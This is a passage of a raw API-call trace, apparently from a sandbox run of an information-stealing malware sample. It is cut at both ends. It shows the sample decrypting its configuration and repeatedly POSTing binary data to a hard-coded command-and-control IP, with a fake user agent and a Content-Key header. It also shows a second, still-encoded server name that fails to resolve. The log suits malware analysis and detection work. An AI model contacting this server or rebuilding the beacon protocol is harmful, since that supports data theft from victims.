hHeap=0x6a0000) returned 1 [0170.546] GetProcessHeap () returned 0x6a0000 [0170.546] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0170.547] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0170.547] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0170.556] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0170.557] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0170.564] GetProcessHeap () returned 0x6a0000 [0170.564] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0170.565] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0170.565] CryptImportKey (in: hProv=0x6beca0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0170.566] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0170.566] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0170.567] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0170.567] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0170.567] GetProcessHeap () returned 0x6a0000 [0170.568] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0170.568] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0170.569] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0170.569] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0170.569] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0170.570] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0170.570] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0170.570] GetProcessHeap () returned 0x6a0000 [0170.570] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0170.571] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0170.571] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0170.572] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0170.572] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0170.573] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0170.573] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0170.574] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0170.574] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0170.574] GetProcessHeap () returned 0x6a0000 [0170.574] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0170.574] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6bf440*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be7f0*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0170.574] GetProcessHeap () returned 0x6a0000 [0170.574] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9d0 [0170.574] socket (af=2, type=1, protocol=6) returned 0x348 [0170.575] connect (s=0x348, name=0x6be7f0*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0170.602] FreeAddrInfoW (pAddrInfo=0x6bf440*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be7f0*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0170.602] GetProcessHeap () returned 0x6a0000 [0170.602] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beb90 [0170.602] GetProcessHeap () returned 0x6a0000 [0170.602] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0170.603] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0170.604] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0170.604] GetProcessHeap () returned 0x6a0000 [0170.604] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0170.604] GetProcessHeap () returned 0x6a0000 [0170.604] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0170.605] GetProcessHeap () returned 0x6a0000 [0170.605] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0170.605] GetProcessHeap () returned 0x6a0000 [0170.605] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0170.605] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0170.606] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0170.607] GetProcessHeap () returned 0x6a0000 [0170.607] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0170.607] GetProcessHeap () returned 0x6a0000 [0170.607] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0170.612] send (s=0x348, buf=0x6bbd20*, len=242, flags=0) returned 242 [0170.612] send (s=0x348, buf=0x6bb998*, len=159, flags=0) returned 159 [0170.612] GetProcessHeap () returned 0x6a0000 [0170.612] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0170.612] recv (in: s=0x348, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0170.676] GetProcessHeap () returned 0x6a0000 [0170.676] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0170.677] GetProcessHeap () returned 0x6a0000 [0170.677] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0170.678] GetProcessHeap () returned 0x6a0000 [0170.679] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0170.679] GetProcessHeap () returned 0x6a0000 [0170.680] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb90 | out: hHeap=0x6a0000) returned 1 [0170.680] closesocket (s=0x348) returned 0 [0170.680] GetProcessHeap () returned 0x6a0000 [0170.680] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9d0 | out: hHeap=0x6a0000) returned 1 [0170.680] GetProcessHeap () returned 0x6a0000 [0170.681] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0170.681] GetProcessHeap () returned 0x6a0000 [0170.681] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0170.681] GetProcessHeap () returned 0x6a0000 [0170.681] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0170.681] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xaf8) returned 0x348 [0170.683] Sleep (dwMilliseconds=0xea60) [0170.684] GetProcessHeap () returned 0x6a0000 [0170.684] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4a30 [0170.685] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0170.685] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0170.690] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0170.691] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6befd0) returned 1 [0170.698] GetProcessHeap () returned 0x6a0000 [0170.698] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b6ae8 [0170.698] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0170.699] CryptImportKey (in: hProv=0x6befd0, pbData=0x6b6ae8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0170.699] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0170.700] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0170.700] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0170.701] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0170.701] GetProcessHeap () returned 0x6a0000 [0170.701] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6ae8 | out: hHeap=0x6a0000) returned 1 [0170.708] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0170.708] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4a30, pdwDataLen=0x19fcfc | out: pbData=0x6b4a30, pdwDataLen=0x19fcfc) returned 1 [0170.709] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0170.709] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0170.710] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0170.710] CryptReleaseContext (hProv=0x6befd0, dwFlags=0x0) returned 1 [0170.710] GetProcessHeap () returned 0x6a0000 [0170.710] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0170.711] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0170.711] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0170.712] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0170.712] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0170.713] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0170.713] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0170.714] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0170.714] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0170.714] GetProcessHeap () returned 0x6a0000 [0170.714] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0170.714] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0170.714] GetProcessHeap () returned 0x6a0000 [0170.715] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0170.715] GetProcessHeap () returned 0x6a0000 [0170.715] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0170.716] GetProcessHeap () returned 0x6a0000 [0170.716] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0170.717] GetProcessHeap () returned 0x6a0000 [0170.717] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0170.717] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0170.718] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0170.724] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0170.724] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6befd0) returned 1 [0170.731] GetProcessHeap () returned 0x6a0000 [0170.731] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0170.731] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0170.732] CryptImportKey (in: hProv=0x6befd0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0170.732] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0170.733] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0170.734] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0170.734] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0170.734] GetProcessHeap () returned 0x6a0000 [0170.734] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0170.738] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0170.739] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0170.743] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0170.744] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0170.745] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0170.745] CryptReleaseContext (hProv=0x6befd0, dwFlags=0x0) returned 1 [0170.745] GetProcessHeap () returned 0x6a0000 [0170.745] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0170.746] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0170.746] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0170.747] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0170.748] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0170.749] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0170.750] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0170.750] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0170.751] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0170.751] GetProcessHeap () returned 0x6a0000 [0170.751] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0170.751] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6bf800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be910*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0170.751] GetProcessHeap () returned 0x6a0000 [0170.751] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baae0 [0170.751] socket (af=2, type=1, protocol=6) returned 0x34c [0170.751] connect (s=0x34c, name=0x6be910*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0170.776] FreeAddrInfoW (pAddrInfo=0x6bf800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be910*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0170.776] GetProcessHeap () returned 0x6a0000 [0170.776] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0170.776] GetProcessHeap () returned 0x6a0000 [0170.776] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0170.776] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0170.777] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0170.777] GetProcessHeap () returned 0x6a0000 [0170.777] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0170.777] GetProcessHeap () returned 0x6a0000 [0170.778] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0170.778] GetProcessHeap () returned 0x6a0000 [0170.778] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0170.778] GetProcessHeap () returned 0x6a0000 [0170.778] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0170.779] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0170.780] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0170.780] GetProcessHeap () returned 0x6a0000 [0170.780] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0170.780] GetProcessHeap () returned 0x6a0000 [0170.780] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0170.781] send (s=0x34c, buf=0x6bbd20*, len=242, flags=0) returned 242 [0170.782] send (s=0x34c, buf=0x6bb998*, len=159, flags=0) returned 159 [0170.783] GetProcessHeap () returned 0x6a0000 [0170.783] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0170.783] recv (in: s=0x34c, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0170.853] GetProcessHeap () returned 0x6a0000 [0170.853] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0170.853] GetProcessHeap () returned 0x6a0000 [0170.853] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0170.853] GetProcessHeap () returned 0x6a0000 [0170.853] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0170.854] GetProcessHeap () returned 0x6a0000 [0170.854] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0170.854] closesocket (s=0x34c) returned 0 [0170.855] GetProcessHeap () returned 0x6a0000 [0170.855] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baae0 | out: hHeap=0x6a0000) returned 1 [0170.855] GetProcessHeap () returned 0x6a0000 [0170.856] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0170.856] GetProcessHeap () returned 0x6a0000 [0170.856] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0170.856] GetProcessHeap () returned 0x6a0000 [0170.857] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0170.857] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xc58) returned 0x34c [0170.858] Sleep (dwMilliseconds=0xea60) [0170.860] GetProcessHeap () returned 0x6a0000 [0170.860] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0170.861] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0170.861] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0170.867] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0170.867] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0170.874] GetProcessHeap () returned 0x6a0000 [0170.874] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6bf820 [0170.874] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0170.875] CryptImportKey (in: hProv=0x6bef48, pbData=0x6bf820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0170.875] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0170.876] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0170.876] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0170.877] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0170.877] GetProcessHeap () returned 0x6a0000 [0170.877] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf820 | out: hHeap=0x6a0000) returned 1 [0170.878] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0170.879] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0170.879] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0170.880] CryptDestroyKey (hKey=0x6ad020) returned 1 [0170.880] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0170.881] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0170.881] GetProcessHeap () returned 0x6a0000 [0170.881] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0170.881] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0170.881] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0170.882] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0170.882] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0170.884] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0170.884] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0170.885] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0170.885] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0170.885] GetProcessHeap () returned 0x6a0000 [0170.885] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0170.885] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0170.885] GetProcessHeap () returned 0x6a0000 [0170.886] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0170.886] GetProcessHeap () returned 0x6a0000 [0170.886] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0170.886] GetProcessHeap () returned 0x6a0000 [0170.887] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0170.890] GetProcessHeap () returned 0x6a0000 [0170.890] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0170.890] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0170.891] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0170.954] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0170.954] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0170.963] GetProcessHeap () returned 0x6a0000 [0170.963] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0170.963] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0170.964] CryptImportKey 